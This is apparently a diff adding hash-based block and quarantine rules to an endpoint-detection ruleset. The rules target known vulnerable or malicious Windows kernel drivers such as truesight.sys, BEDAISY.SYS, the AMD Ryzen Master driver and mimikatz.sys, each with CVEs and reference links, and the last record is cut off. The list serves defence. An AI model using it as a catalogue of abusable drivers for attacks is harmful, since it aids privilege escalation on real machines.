+ "id": "78f2a00f-f06c-595a-bb4c-28577e09d7ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488170Z",
+ "creation_date": "2026-03-23T11:45:31.488172Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488177Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fa1f1e15af1793f292683e0ec1abb0ee60bf21a3ce8cd8792f859ead578e2ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "78f416b1-058f-5e1a-9dc4-1ab9965914b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981278Z",
+ "creation_date": "2026-03-23T11:45:29.981280Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981286Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ae383546761069b26826dfbf2ac0233169d155bca6a94160488092b4e70b222",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7909bf95-a53e-57eb-a90f-ed8b8981f3a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975255Z",
+ "creation_date": "2026-03-23T11:45:29.975257Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975262Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37f16c8232ec679ee400c76272fc9b56977524e70cfd5cce375ab79f4750bf64",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7913d6f9-9654-5c64-8d4f-7737b7911bfb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818860Z",
+ "creation_date": "2026-03-23T11:45:30.818862Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818868Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7690ef2838bda2327116243c1792090125b36a5840464e010acdd103f7369807",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "791c6f5b-95b5-5737-80b8-af0fda71a54e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160421Z",
+ "creation_date": "2026-03-23T11:45:31.160423Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160429Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f2291c7a5f6e186bf095ecb2a86d4ad42ca413a8d8075ee486f5b1c82599a19d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "792c92f7-1ec0-5043-87e3-2607a075b827",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825386Z",
+ "creation_date": "2026-03-23T11:45:31.825388Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825394Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93d7bbc215f593f416e1582ed7426837cccacb2e2e599ded297c524c294e2869",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79341eb9-dd29-519f-9cda-c91be93de50c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820825Z",
+ "creation_date": "2026-03-23T11:45:30.820827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c586befc3fd561fcbf1cf706214ae2adaa43ce9ba760efd548d581f60deafc65",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "793a11e2-38d9-5fce-99ae-19a431425fea",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981296Z",
+ "creation_date": "2026-03-23T11:45:29.981298Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981303Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0bd164da36bd637bb76ca66602d732af912bd9299cb3d520d26db528cb54826d",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "795a64ed-a003-50c5-83bd-ee5f0070fe54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821944Z",
+ "creation_date": "2026-03-23T11:45:31.821946Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821962Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e833157a12ac6f032c43616f5d9506674cc860a85add76cbd9d007c3ad09ad3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7960d647-9791-5344-a1ac-1759f380e604",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974052Z",
+ "creation_date": "2026-03-23T11:45:29.974054Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974059Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4d9f037411284e996a002b15b49bc227d085ee869ae1cd91ba54ff7c244f036",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7962022d-c3bf-5abb-9a67-2f7baf0bc17c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.815915Z",
+ "creation_date": "2026-03-23T11:45:30.815917Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.815923Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1970400679c3ae7000f1ba3e0f12c2d5443df7fbb8947cabe45c7ae977806efb",
+ "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7962e7af-6356-57cd-9dcc-693697680153",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461906Z",
+ "creation_date": "2026-03-23T11:45:30.461909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461918Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ece76b79feafb38ae4371e104b6dcbb4253ff3b2acbe5bd14ce6e47525c24f4a",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7966a510-817b-5d16-8e0e-dd52c567a236",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477026Z",
+ "creation_date": "2026-03-23T11:45:30.477029Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477038Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a1b56ae08d822bb5d041c2a67584371ffddcb7f6d69191efec5b8189e0028331",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "796f755b-1889-544c-b4f6-b822c5beaf3a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982730Z",
+ "creation_date": "2026-03-23T11:45:29.982732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a84bec9cf836c3abdc0f99e389c72041b6c2b1ba2921d272436e2b8a9b98afb1",
+ "comment": "Vulnerable Kernel Driver (aka d4.sys) [https://www.loldrivers.io/drivers/c2e70ee6-2f13-4d43-ad5a-c2bf033cc457/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7975ddd7-dd13-5557-ab6b-169625ce1219",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972178Z",
+ "creation_date": "2026-03-23T11:45:29.972180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c21e7ce6ef61ee173e11104252c8d9a22a976f5dd61c83c2f54f363e67feee93",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "798055c0-66ae-54bd-bc3c-1858f90ba9db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494867Z",
+ "creation_date": "2026-03-23T11:45:31.494887Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494893Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "165b01284ea23d63d615859002fa9d212fea61cffe9094deba8dc55ae40f177d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79820787-2b97-5e4a-91e0-d2f89ef29a7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614753Z",
+ "creation_date": "2026-03-23T11:45:29.614755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7986f81c-f3e2-5314-9493-c9006a7d2be8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617661Z",
+ "creation_date": "2026-03-23T11:45:29.617663Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617668Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb19f241ddae74ec4a0f87dff025ec68dc809f9dd883649c0e58822de28e6f1b",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "798f0449-f4be-577e-9c39-aacac3c3c61d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476789Z",
+ "creation_date": "2026-03-23T11:45:31.476793Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476802Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87e396f5825bce67a694ab32e41c99e40312598edc6889a7c7f31c9f6414e4c4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "799130e4-3639-5ecf-a992-df7a3cfe26ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817793Z",
+ "creation_date": "2026-03-23T11:45:30.817796Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817804Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51859571d807d984e4f1cf145d5d74491feabd19327309c2c598c496a1976c70",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79a8e591-6acc-5c03-b18c-7a06f15f2538",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979929Z",
+ "creation_date": "2026-03-23T11:45:29.979931Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979937Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66d59e646f3965bc5225eca4285ae65f34b8681fb1bee3eaf440f6795b2fa70f",
+ "comment": "Vulnerable Kernel Driver (aka FairplayKD.sys) [https://www.loldrivers.io/drivers/31686f0e-3748-48c2-be09-fc8f3252e780/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79b143dc-4f06-554a-ab7c-b68fe01a84db",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807465Z",
+ "creation_date": "2026-03-23T11:45:31.807467Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807473Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0202d1edcd86145beb45be24f2af3d5b5652c28a6eef80b8518bee2df31bd347",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "79b2dac3-68ce-5168-89fc-a3423e0df862",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
